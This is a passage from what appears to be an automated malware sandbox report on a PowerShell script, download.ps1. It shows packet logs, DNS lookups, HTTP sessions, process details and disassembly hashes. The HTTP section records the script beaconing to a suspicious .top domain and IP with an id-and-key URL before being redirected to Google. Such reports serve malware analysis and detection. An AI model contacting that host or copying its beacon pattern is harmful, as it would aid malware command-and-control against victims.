                                                                                                  Jan 5, 2025 08:44:06.510163069 CET804973045.61.136.138192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.136833906 CET804973045.61.136.138192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.153069019 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.158879995 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.161211014 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.161339045 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.166501999 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.183698893 CET4973080192.168.2.445.61.136.138
                                                                                                  Jan 5, 2025 08:44:07.821418047 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821435928 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821453094 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821516991 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.821527958 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821538925 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821549892 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821562052 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821573973 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821593046 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.821619987 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821621895 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.821639061 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.821681023 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.826379061 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.826437950 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.826493025 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.908138037 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.908205986 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.908217907 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.908291101 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.910916090 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.910964966 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.910972118 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.910975933 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.911019087 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.917220116 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.917248011 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.917258978 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.917293072 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.923507929 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.923521042 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.923532963 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.923563957 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.923608065 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.929884911 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.929898024 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.929908037 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.929945946 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.936176062 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.936228991 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.936239958 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.936247110 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.937040091 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.942456007 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.942475080 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.942485094 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.942528009 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.948787928 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.948817015 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.948827982 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.948841095 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.948872089 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.955059052 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.955112934 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.955125093 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.955176115 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.961375952 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.961395025 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.961410999 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.961441040 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.961453915 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.995234966 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.995246887 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.995260000 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.995285988 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.997415066 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.997451067 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.997459888 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:07.997591972 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.997601032 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.997637987 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:08.004760981 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.004774094 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.004785061 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.004796028 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:08.004816055 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:08.010586977 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.010598898 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.010610104 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.010631084 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:08.016444921 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.016457081 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.016468048 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.016501904 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:08.016539097 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:08.024146080 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.024317026 CET8049731142.250.185.164192.168.2.4
                                                                                                  Jan 5, 2025 08:44:08.024375916 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:08.262166977 CET4973180192.168.2.4142.250.185.164
                                                                                                  Jan 5, 2025 08:44:08.262821913 CET4973080192.168.2.445.61.136.138

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 5, 2025 08:44:05.964107990 CET6173653192.168.2.41.1.1.1
                                                                                                  Jan 5, 2025 08:44:06.485321999 CET53617361.1.1.1192.168.2.4
                                                                                                  Jan 5, 2025 08:44:07.140050888 CET5984653192.168.2.41.1.1.1
                                                                                                  Jan 5, 2025 08:44:07.147943974 CET53598461.1.1.1192.168.2.4

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 5, 2025 08:44:05.964107990 CET192.168.2.41.1.1.10xadfaStandard query (0)kcehmenjdibnmni.topA (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:44:07.140050888 CET192.168.2.41.1.1.10xf4b5Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 5, 2025 08:44:06.485321999 CET1.1.1.1192.168.2.40xadfaNo error (0)kcehmenjdibnmni.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:44:07.147943974 CET1.1.1.1192.168.2.40xf4b5No error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • kcehmenjdibnmni.top
                                                                                                  • www.google.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.44973045.61.136.138807356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 5, 2025 08:44:06.505407095 CET215OUTGET /trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                  Host: kcehmenjdibnmni.top
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 5, 2025 08:44:07.136833906 CET166INHTTP/1.1 302 Found
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sun, 05 Jan 2025 07:44:07 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: keep-alive
                                                                                                  Location: http://www.google.com


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449731142.250.185.164807356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 5, 2025 08:44:07.161339045 CET159OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                  Host: www.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 5, 2025 08:44:07.821418047 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:44:07 GMT
                                                                                                  Expires: -1
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-id1cOR58uDo3nXmvhgL8Qw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                  Server: gws
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Set-Cookie: AEC=AZ6Zc-XfRDeu_k3yzfbXqetrsy4_2Nxs7GHMv41e_SFBVuUoNb1SNSc-pA8; expires=Fri, 04-Jul-2025 07:44:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                  Set-Cookie: NID=520=YNueLCNty0NO0NsI5WHmCzuQ3NUQ--TRQSRVynkaW06dxj8puHbqDl5EUq-q0agQJia36PRAhCuS2BXdNQYz1SqZ7jEsB8qqnQMccWqJrx-YbiHS1R_b4ZbSk1z7EH65ctTF01w7jCxiCqnU4A3SeZjVSO2x4SZRiq_yu2h8GSBhDE6dy5TxjeNEBwUGF3dInU7n08pI; expires=Mon, 07-Jul-2025 07:44:07 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                  Accept-Ranges: none
                                                                                                  Vary: Accept-Encoding
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Data Raw: 34 34 34 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20
                                                                                                  Data Ascii: 4449<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                  Jan 5, 2025 08:44:07.821435928 CET1236INData Raw: 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f
                                                                                                  Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/im
                                                                                                  Jan 5, 2025 08:44:07.821453094 CET1236INData Raw: 2c 31 2c 38 39 30 2c 32 37 33 2c 32 2c 36 2c 34 2c 31 32 39 2c 35 30 37 2c 31 2c 33 2c 32 34 2c 36 31 2c 39 37 2c 33 39 33 2c 34 38 34 2c 31 36 32 2c 33 39 34 2c 32 31 35 2c 31 2c 32 36 31 2c 32 32 38 2c 33 2c 32 34 32 2c 31 33 2c 31 32 36 2c 35
                                                                                                  Data Ascii: ,1,890,273,2,6,4,129,507,1,3,24,61,97,393,484,162,394,215,1,261,228,3,242,13,126,524,2,86,161,620,73,41,267,1,525,201,66,101,580,36,466,2,207,1266,277,527,36,462,870,2,331,15,831,85,446,5,921,241,3,380,57,347,538,22,165,474,12,35,22,110,290,8,
                                                                                                  Jan 5, 2025 08:44:07.821527958 CET672INData Raw: 2d 31 26 26 28 63 3d 70 28 63 29 29 26 26 28 65 2b 3d 22 26 6c 65 69 3d 22 2b 63 29 29 3b 76 61 72 20 66 3d 62 2e 73 65 61 72 63 68 28 22 26 63 73 68 69 64 3d 22 29 3d 3d 3d 2d 31 26 26 61 21 3d 3d 22 73 6c 68 22 3b 63 3d 22 26 7a 78 3d 22 2b 44
                                                                                                  Data Ascii: -1&&(c=p(c))&&(e+="&lei="+c));var f=b.search("&cshid=")===-1&&a!=="slh";c="&zx="+Date.now().toString();g._cshid&&f&&(c+="&cshid="+g._cshid);(d=d())&&(c+="&opi="+d);return"/"+(h||"gen_204")+"?atyp=i&ct="+String(a)+"&cad="+(b+e+c)};l=google.kEI;
                                                                                                  Jan 5, 2025 08:44:07.821538925 CET1236INData Raw: 6e 64 6f 6d 28 29 3b 77 68 69 6c 65 28 67 6f 6f 67 6c 65 2e 79 5b 63 5d 29 7d 67 6f 6f 67 6c 65 2e 79 5b 63 5d 3d 5b 61 2c 62 5d 3b 72 65 74 75 72 6e 21 31 7d 29 3b 76 61 72 20 65 3b 28 65 3d 67 6f 6f 67 6c 65 29 2e 73 78 7c 7c 28 65 2e 73 78 3d
                                                                                                  Data Ascii: ndom();while(google.y[c])}google.y[c]=[a,b];return!1});var e;(e=google).sx||(e.sx=function(a){google.sy.push(a)});google.lm=[];var f;(f=google).plm||(f.plm=function(a){google.lm.push.apply(google.lm,a)});google.lq=[];var g;(g=google).load||(g.
                                                                                                  Jan 5, 2025 08:44:07.821549892 CET1236INData Raw: 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 39 39 38 3b 72 69 67 68 74 3a
                                                                                                  Data Ascii: ound:transparent;position:absolute;top:-999px;visibility:hidden;z-index:998;right:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{background-color:#2d2d2d;background-image:none;_background-image:none;background-position:0 -138px;background-repeat:rep
                                                                                                  Jan 5, 2025 08:44:07.821562052 CET1236INData Raw: 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f
                                                                                                  Data Ascii: rm.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px\0/}.gbma{position:relative
                                                                                                  Jan 5, 2025 08:44:07.821573973 CET1236INData Raw: 6f 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 62 65 62 65 62 65 3b 63 6f 6c 6f 72 3a 23 33 36 63 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67
                                                                                                  Data Ascii: o .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:
                                                                                                  Jan 5, 2025 08:44:07.821619987 CET1236INData Raw: 70 3a 33 70 78 7d 2e 67 62 69 34 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 32 34 70 78 7d 23 67 62 69 34 69 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 34 34 70 78 20 2d 31 30 31 70 78 7d 23 67 62
                                                                                                  Data Ascii: p:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-height:9px;padding-left:20p
                                                                                                  Jan 5, 2025 08:44:07.821639061 CET1236INData Raw: 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 67 62 6d 6c 62 2d 68
                                                                                                  Data Ascii: gin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;c
                                                                                                  Jan 5, 2025 08:44:07.826379061 CET1236INData Raw: 2e 67 62 70 63 20 2e 67 62 70 73 2c 2e 67 62 70 63 20 2e 67 62 70 73 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 23 67 62 6d 70 6c 70 2e 67 62 70 73 7b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67
                                                                                                  Data Ascii: .gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#666 !important}.gbpd .gbmt{opacity:.4;filter:alpha(opacity=40)


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:02:43:59
                                                                                                  Start date:05/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:02:43:59
                                                                                                  Start date:05/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9BAF3D6D Relevance: 5.2, Strings: 3, Instructions: 1488COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1802721239.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9baf0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 7y2$ 7y2$'_H
                                                                                                    • API String ID: 0-3659216923
                                                                                                    • Opcode ID: c296d7ace04591ecb5cd78a292e7770394ff8fe1395f199b6007699b90cc86bc
                                                                                                    • Instruction ID: 348014ded1b5044fb8f8957d1465019f28259fd085d44b8d243639f078b65af8
                                                                                                    • Opcode Fuzzy Hash: c296d7ace04591ecb5cd78a292e7770394ff8fe1395f199b6007699b90cc86bc
                                                                                                    • Instruction Fuzzy Hash: 71B2F531B0EA894FE7A9EB6888656B4BBE1EF64300F1901FED05DC71E7DE24AC458741
                                                                                                    Function 00007FFD9B896F46 Relevance: .5, Instructions: 468COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 69f87aee7d62473ebbe7787b131182e50598b19365965e885c7871e64c96ba9c
                                                                                                    • Instruction ID: 3a708e7e036d4e06e8bb1bf9c09c64d9f6666c5a84a51dc10b479e38af76568a
                                                                                                    • Opcode Fuzzy Hash: 69f87aee7d62473ebbe7787b131182e50598b19365965e885c7871e64c96ba9c
                                                                                                    • Instruction Fuzzy Hash: 1CF1A630A18A8E8FEFA8DF68C8557E93BD1FF58310F14426EE84DC7295DB3499458B81
                                                                                                    Function 00007FFD9B897CF2 Relevance: .5, Instructions: 454COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 966c30ef239f575a7d6be0c8bcd9ea041ec62e86967886f236057c03f08c3fad
                                                                                                    • Instruction ID: a7fe286f9908d21700c10911e9c4d20dda7fc7fb3f7b1c486da5672bd52cff7f
                                                                                                    • Opcode Fuzzy Hash: 966c30ef239f575a7d6be0c8bcd9ea041ec62e86967886f236057c03f08c3fad
                                                                                                    • Instruction Fuzzy Hash: E0E1A330A09A4E8FEFA8DF28C8557E97BD1FF58310F14426AE84DC7295DF7499418B82
                                                                                                    Function 00007FFD9BAF3C2C Relevance: 5.1, Strings: 3, Instructions: 1321COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1802721239.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9baf0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 7y2$x6y2$'_L
                                                                                                    • API String ID: 0-4039748445
                                                                                                    • Opcode ID: 06c28e1521b5c17de120b9aacc6e1e8bf31aeb0bb105a6e5aef8a2c1def0423d
                                                                                                    • Instruction ID: 6e84be9a68fee22e4e56edb26512ba66cfd6e442de681565b2d05218c341460d
                                                                                                    • Opcode Fuzzy Hash: 06c28e1521b5c17de120b9aacc6e1e8bf31aeb0bb105a6e5aef8a2c1def0423d
                                                                                                    • Instruction Fuzzy Hash: DAA2D431B0DA494FEBA9EB5888A5AA4BBE1EF64300F1941BDD04DC71E3DE35AC46C741
                                                                                                    Function 00007FFD9BAF6790 Relevance: 4.0, Strings: 2, Instructions: 1537COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1802721239.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9baf0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 7y2$x6y2
                                                                                                    • API String ID: 0-1471476893
                                                                                                    • Opcode ID: 57f7ae4394c96f681ce2fd452d5593f611b54793155e1f3bcc4bff5ff61fb366
                                                                                                    • Instruction ID: d0a7e75c0a39369baa3e16dacd641ea4140bb436d0def55844b2ec07bebd5f9e
                                                                                                    • Opcode Fuzzy Hash: 57f7ae4394c96f681ce2fd452d5593f611b54793155e1f3bcc4bff5ff61fb366
                                                                                                    • Instruction Fuzzy Hash: EFB2E571B0EA894FEBA9DB688865AA47BE1EF64300F1900FED05DC72D3DE65AC41C740
                                                                                                    Function 00007FFD9BAF6BAF Relevance: .5, Instructions: 473COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1802721239.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
